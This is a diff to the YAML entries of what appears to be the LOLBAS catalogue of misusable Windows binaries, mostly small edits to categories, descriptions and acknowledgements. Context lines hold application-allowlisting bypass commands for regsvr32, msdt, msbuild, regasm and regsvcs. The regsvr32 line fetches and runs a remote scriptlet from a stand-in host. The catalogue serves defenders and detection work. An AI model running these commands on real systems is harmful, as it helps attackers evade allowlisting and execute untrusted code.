  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
@ -39,4 +39,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Malwrologist
    Handle: '@DissectMalware'
---
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@gN3mes1s'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@FortyNorthSec'
  - Person: Bank Security
    Handle: '@Bank_Security'
---
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@bohops'
  - Person: clem
    Handle: '@clavoillotte'
---
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -53,4 +53,3 @@ Acknowledgement:
    Handle: ''
  - Person: Cedric
    Handle: '@th3c3dr1c'
---
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -7,7 +7,7 @@ Commands:
  - Command: msbuild.exe pshell.xml
    Description: Build and execute a C# project stored in the target XML file.
    Usecase: Compile and run code
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -77,4 +77,3 @@ Acknowledgement:
    Handle: '@Cneelis'
  - Person: Jimmy
    Handle: '@bohops'
---
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -14,7 +14,7 @@ Commands:
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -69,4 +69,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -51,4 +51,3 @@ Acknowledgement:
    Handle: '@netbiosX'
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
---
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Adam
    Handle: '@Hexacorn'
---
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@ -19,4 +19,3 @@ Detection:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -38,4 +38,3 @@ Acknowledgement:
    Handle: '@kylehanslovan'
  - Person: Fab
    Handle: '@0rbz_'
---
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
  - Person: Derek Johnson
    Handle: ''
---
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
    Handle: '@LuxNoBulIshit'
  - Person: Avihay eldad
    Handle: '@aloneliassaf'
---
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Leon Rodenko
    Handle: '@L3m0nada'
---
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: FireEye
    Handle: '@FireEye'
---
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@ -41,4 +41,3 @@ Resources:
 Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
---
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -7,7 +7,7 @@ Commands:
  - Command: regasm.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Eli Salem
    Handle: '@elisalem9'
---
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
---
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -14,7 +14,7 @@ Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -7,14 +7,14 @@ Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -57,4 +57,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
---
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: elceef
    Handle: '@elceef'
---
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -39,4 +39,3 @@ Acknowledgement:
    Handle: '@splinter_code'
  - Person: ap
    Handle: '@decoder_it'
---
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -91,4 +91,3 @@ Acknowledgement:
    Handle: '@404death'
  - Person: Martin Ingesen
    Handle: '@Mrtn9'
---
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -1,6 +1,6 @@
 ---
 Name: Runonce.exe
-Description:
+Description: Executes a Run Once Task that has been configured in the registry
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
---
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -1,6 +1,6 @@
 ---
 Name: Runscripthelper.exe
-Description:
+Description: Execute target PowerShell script
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
---
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
---
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -1,6 +1,6 @@
 ---
 Name: Scriptrunner.exe
-Description:
+Description: Execute binary through proxy binary to evade defensive counter measures
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@nicktyrer'
---
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Elliot Killick
    Handle: '@elliotkillick'
---
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
---
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Landers
    Handle: '@monoxgas'
---
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Maxime Nadeau
    Handle: '@m_nad0'
---
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@oulusoyum'
  - Person: Matt Graeber
    Handle: '@mattifestation'
---
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle:
  - Person: Hai Vaknin(Lux)
    Handle:
---
--- a/Show More
+++ b/Show More